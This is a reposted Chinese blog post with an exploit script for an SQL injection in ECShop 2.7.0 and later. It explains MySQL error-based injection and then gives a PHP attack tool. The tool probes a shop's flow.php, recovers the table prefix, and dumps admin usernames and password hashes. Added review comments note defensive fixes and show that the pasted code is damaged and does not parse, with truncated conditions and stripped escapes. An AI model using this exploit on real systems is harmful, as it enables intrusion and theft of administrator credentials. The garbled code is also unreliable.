【转载】Ecshop lib_common.php注入


昨天无意间读到:
    http://www.packetstormsecurity.org/papers/database/PT-devteev-FAST-blind-SQL-Injection.txt

发现原来可以这样注入
    MySQL >= 5.0:

        执行:
            select 1,2 union select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;

        或:
            select 1 and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

        会报错:
            Duplicate entry '5.1.30-community1' for key 'group_key'

    MySQL

        执行:
            select 1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1);

    数次后会报错:

        Duplicate entry '4.1.22-community-nt:1' for key 1

正好解决了ecshop最新的漏洞,无礼包限制。

影响版本:
    ecshop >= 2.7.0

package.php:

/*
 * P.O.C. by xsser - http://www.wooyun.org/bug.php?action=view&id=248
 */
// ---------------------------------------------------------------------------
// Driver section (executes at load time).
// Takes <host> and <path> from the command line, probes the target through
// POST() below, then reads admin rows one at a time via Inject().
// NOTE(review): this copy is damaged by republication — the `if (count($argv)`
// condition and both `for (...)` headers are cut off, and the trailing `n` in
// the string literals looks like a `\n` escape whose backslash was stripped.
// It records the technique; it does not parse as pasted.
// Defensive takeaway: every step keys on verbose MySQL error text being echoed
// in the HTTP response ("MySQL server error report", "Duplicate entry ... for
// key"). Not exposing database errors to clients and binding package_id as a
// query parameter removes both the oracle and the injection.
// ---------------------------------------------------------------------------
error_reporting(E_ALL  & ~E_WARNING);   // keep notices/errors, hide warnings (socket/regex warnings would otherwise clutter output)
ini_set('display_errors', '1');
@set_time_limit(0);                      // no time limit: the fallback branches in ucount()/Inject() retry in loops

hr();
banner();
// Argument-count guard; the condition is truncated in this copy.
if (count($argv)
{
 usage();   // usage() declares $argv0 but is called with no argument
 exit;
}
hr();

$host = $argv[1];   // target host, handed straight to fsockopen() in POST()
$path = $argv[2];   // base path; each helper appends 'flow.php?step=add_package_to_cart'

$username = array();   // filled by reference from Inject(), indexed 1..$ucount
$password = array();

exploit($host, $path);                   // die()s with "No Vulnerability" if the error marker is absent
print "Getting database prefix ...n";
$pre = prefix($host, $path);
define('PRE',$pre);                      // table prefix that every later query string concatenates
print "Verifying MySQL Version...n";
$version = version($host, $path); 
print "Counting admin user ...n";
$ucount = ucount($host, $path,$version);   // $version selects which of the two query shapes is used
print "Admin Users : $ucountn";
// Loop header truncated in this copy; the body runs once per admin row (1-based $i).
for ($i=1;$i
{
 print "Injecting username and password for admin $i ...n";
 Inject($host, $path,$i,$username[$i],$password[$i],$version);   // $username[$i] / $password[$i] are created by the by-reference call
 print "n";
}
 hr();
 print "*n";
 print "* [+] Target Host   : $host$pathn";
 print "* [+] Admin Founded : $ucountn";
 print "*n";
// Summary loop; header truncated in this copy.
for ($i=1;$i
{
 print "* [+] Username : " . $username[$i] . "n";
 print "*     Passowrd : " . $password[$i] . "n";   // "Passowrd" typo is part of the original output text
 print "*n";
}
 hr();

/**
 * Print the horizontal rule that frames the console output.
 *
 * The literal is reproduced exactly as found (its trailing `n` is
 * presumably a `\n` escape whose backslash was stripped on republication).
 */
function hr()
{
    echo "****************************************************************************n";
}

/**
 * Print the four-line identification banner (title, date, author, contact).
 *
 * Text is reproduced verbatim from the original listing; only the output
 * statement form differs.
 */
function banner()
{
    echo "* [+] Exploit      : ECShop >= 2.7.0 (lib_common.php) Remote SQL Injection *n",
         "* [+] Date         : 22-08-2010                                            *n",
         "* [+] Author       : alibaba                                               *n",
         "* [+] QQ           : 1499281192                                            *n";
}

/**
 * Print the command-line usage block, framed by hr() lines.
 *
 * @param mixed $argv0 kept for interface compatibility; unused (the
 *                     driver section calls usage() with no argument)
 */
function usage($argv0)
{
    hr();
    echo "* [+] Usage   : php package.php                               *n",
         "* [+] Example : php package.php www.ecshop.com /                           *n",
         "* [+] Example : php package.php www.ecshop.com /shop/                      *n";
    hr();
}

/**
 * Probe for the injection point; abort the run when it is absent.
 *
 * Posts a package_info JSON whose package_id carries a stray quote and
 * treats the literal "MySQL server error report" in the reply as
 * confirmation. Prints "Vulnerability Founded!" or die()s with
 * "No Vulnerability".
 *
 * `!strrpos(...)` also reads an offset-0 match as "not found" (strrpos
 * returns 0 there, not false); harmless for an HTTP reply that begins with
 * a status line, but `=== false` is the precise test.
 *
 * Defensive note: the probe depends entirely on database error text
 * reaching the client; an application that logs DB errors server-side and
 * returns a generic error gives it nothing to key on.
 */
function exploit($host, $path)
{
 $url = $path . 'flow.php?step=add_package_to_cart';
 // The bare ' inside this single-quoted literal is presumably a stripped \' — as pasted the line does not parse.
 $data = 'package_info={"package_id":"1'","number":"1"}';
 $buffer = POST($host,80,$url,$data,30);   // plain HTTP on port 80, 30 s connect timeout
 if (!strrpos($buffer,"MySQL server error report"))
  die("No Vulnerability");
 else
  print "Vulnerability Founded!n";
}

/**
 * Recover the table prefix used by the target's schema.
 *
 * Sends a UNION that names `ecs_admin_user` explicitly. If no error marker
 * comes back, the default prefix 'ecs_' is assumed; otherwise the error text
 * is expected to contain "FROM `<db>`.`<prefix>package_goods`" and the prefix
 * is taken from the second capture. Returns '' when the pattern does not
 * match, so PRE may end up defined as an empty string.
 *
 * Both `(.+)` groups are greedy; that only works because the echoed SQL is
 * short. Same `!strrpos` offset-0 caveat as in exploit().
 *
 * Defensive note: the prefix leaks through the SQL text quoted in the error
 * message — another reason never to return query text to clients.
 */
function prefix($host, $path)
{
 $url = $path . "flow.php?step=add_package_to_cart";
 $data = 'package_info={"package_id":"1 and 1=2 union all select 1,2,1,4,5,6,1,8,9,0 from ecs_admin_user--","number":"1"}';
 $buffer = POST($host,80,$url,$data,30);
 if (!strrpos($buffer,"MySQL server error report"))
  $pre = 'ecs_';   // no error => the guessed table name worked, keep the default prefix
 else
 {
  preg_match("/FROM `(.+)`.`(.+)package_goods`/i",$buffer,$m);   // $m[1] = database, $m[2] = prefix
  $pre = isset($m[2])? $m[2] : '';
 }
 return $pre;
}

/**
 * Decide whether the target's MySQL exposes information_schema (>= 5.0).
 *
 * Sends the same count(*)/group-by query ucount() uses and inspects the
 * reply: if it contains "'information_schema.tables' doesn't exist" the
 * server is treated as pre-5.0 and false is returned; anything else
 * returns true. The boolean chooses between the two query shapes in
 * ucount() and Inject().
 *
 * The first print inside the if-branch is truncated in this copy
 * (presumably the "< 5.0" message), so the function does not parse as
 * pasted.
 */
function version($host, $path)
{
 $url = $path . "flow.php?step=add_package_to_cart";
 $data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,count(*),concat((Select concat(0x5b,count(user_name),0x5d) FROM ' . PRE . 'admin_user LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x","number":"1"}';
 $buffer = POST($host,80,$url,$data,30);
 if (preg_match("/'information_schema.tables' doesn't exist/i",$buffer))
 {
  print "MySQL Version
  return false;
 }
 else
 {
  print "MySQL Version >= 5.0n";
  return true;
 }
}

/**
 * Read the number of rows in <PRE>admin_user through the error oracle.
 *
 * $version true : one request using the information_schema group-by query;
 *                 the count is expected inside the "Duplicate entry '[...]1'"
 *                 error text.
 * $version false: repeat the row(1,1) variant until a "Duplicate entry" error
 *                 appears (the loop suggests the error is not raised on every
 *                 attempt); the loop bound is truncated in this copy.
 * Returns $m[1] from the last preg_match.
 *
 * NOTE(review): as reproduced, `[(.+)]1` is a PCRE character class followed
 * by `1`, not a bracketed capture — presumably `\[` / `\]` lost their
 * backslashes. With no capture group, or with no match at all, $m[1] is
 * undefined and this returns null. Reading $m outside the branch that set
 * it is fragile regardless.
 */
function ucount($host, $path, $version)
{
 $url = $path . "flow.php?step=add_package_to_cart";
 if ($version)
 {
  $data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,count(*),concat((Select concat(0x5b,count(user_name),0x5d) FROM ' . PRE . 'admin_user LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x","number":"1"}';
  $buffer = POST($host,80,$url,$data,30);
  preg_match("/Duplicate entry '[(.+)]1' for key/i",$buffer,$m);
 }
 else
 {
  $found = false;
  $i=0;
  // While-condition truncated in this copy (an upper bound on $i is implied by the $i++ below).
  while($found==false && $i
  {
   $data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,9,10 and row(1,1)>(select count(*),concat((Select concat(0x5b,count(user_name),0x5d) from ' . PRE . 'admin_user),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)","number":"1"}';
   $buffer = POST($host,80,$url,$data,30);
   if (preg_match("/Duplicate entry '[(.+)]1' for key/i",$buffer))
   {
    preg_match("/Duplicate entry '[(.+)]1' for key/i",$buffer,$m);   // second match only to populate $m
    $found = true;
   }
   $i++;
  }
 }
 return $m[1];
}

/**
 * Read one admin row (user_name and password columns) into the by-reference
 * $username / $password arguments.
 *
 * $number is 1-based from the caller; the decrement turns it into the
 * 0-based LIMIT offset used in the query. The query shape is selected by
 * $version exactly as in ucount(); the reply is expected to carry
 * "[<user>:<pass>]1" inside the "Duplicate entry" error, captured into
 * $m[1] and $m[2].
 *
 * Same caveats as ucount(): `[(.+):(.+)]` is a character class in this copy
 * (brackets presumably lost their escaping), the while-condition is
 * truncated, and $m may be unset when nothing matched — both out-params
 * then end up null.
 *
 * Style: two values are returned through reference parameters; returning
 * a small array would be the idiomatic form. Left unchanged.
 */
function Inject($host, $path, $number, &$username, &$password, $version)
{
 $number--;   // 1-based admin index -> 0-based LIMIT offset
 $username = '';
 $url = $path . "flow.php?step=add_package_to_cart";
 if ($version)
 {
  $data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,count(*),concat((Select concat(0x5b,user_name,0x3a,password,0x5d) FROM ' . PRE . 'admin_user LIMIT ' . $number . ',1),floor(rand(0)*2))x from information_schema.tables group by x","number":"1"}';
  $buffer = POST($host,80,$url,$data,30);
  preg_match("/Duplicate entry '[(.+):(.+)]1' for key/i",$buffer,$m);
 }
 else
 {
  $found = false;
  $i=0;
  // While-condition truncated in this copy.
  while($found==false && $i
  {
   $data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,9,10 and row(1,1)>(select count(*),concat((Select concat(0x5b,user_name,0x3a,password,0x5d) from ' . PRE . 'admin_user LIMIT ' . $number . ',1),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)","number":"1"}';
   $buffer = POST($host,80,$url,$data,30);
   if (preg_match("/Duplicate entry '[(.+)]1' for key/i",$buffer))
   {
    preg_match("/Duplicate entry '[(.+):(.+)]1' for key/i",$buffer,$m);   // re-run with two groups to fill $m
    $found = true;
   }
   $i++;
  }
 }
 $username = $m[1];
 $password = $m[2];
}

/**
 * Minimal HTTP/1.0 POST over a raw socket; returns the whole reply
 * (status line, headers and body) as one string.
 *
 * @param string $host    host name / IP handed to fsockopen()
 * @param int    $port    TCP port (every caller passes 80)
 * @param string $path    request target
 * @param string $data    body, sent verbatim; callers pass unencoded JSON even
 *                        though the Content-type header claims form encoding
 * @param int    $timeout fsockopen() connect timeout in seconds
 * @param string $cookie  accepted but never used
 *
 * die()s with host, path and the socket error when the connection fails,
 * so no value is returned in that case. The "rn" sequences are presumably
 * "\r\n" CRLF escapes whose backslashes were stripped; as pasted the
 * request is not a valid HTTP message. The read loop runs to EOF and relies
 * on "Connection: close" to terminate.
 */
function POST($host,$port,$path,$data,$timeout, $cookie='') {
 $buffer='';

    $fp = fsockopen($host,$port,$errno,$errstr,$timeout);
    if(!$fp) die($host.'/'.$path.' : '.$errstr.$errno);
 else {
        fputs($fp, "POST $path HTTP/1.0rn");
        fputs($fp, "Host: $hostrn");
        fputs($fp, "Content-type: application/x-www-form-urlencodedrn");
        fputs($fp, "Content-length: ".strlen($data)."rn");   // byte length of the raw body
        fputs($fp, "Connection: closernrn");
        fputs($fp, $data."rnrn");
       
  while(!feof($fp))
  {
   $buffer .= fgets($fp,4096);   // accumulate headers and body until the server closes
  }
   
  fclose($fp);
    }
 return $buffer;
}
?>

文章来源于lcx.cc:【转载】Ecshop lib_common.php注入
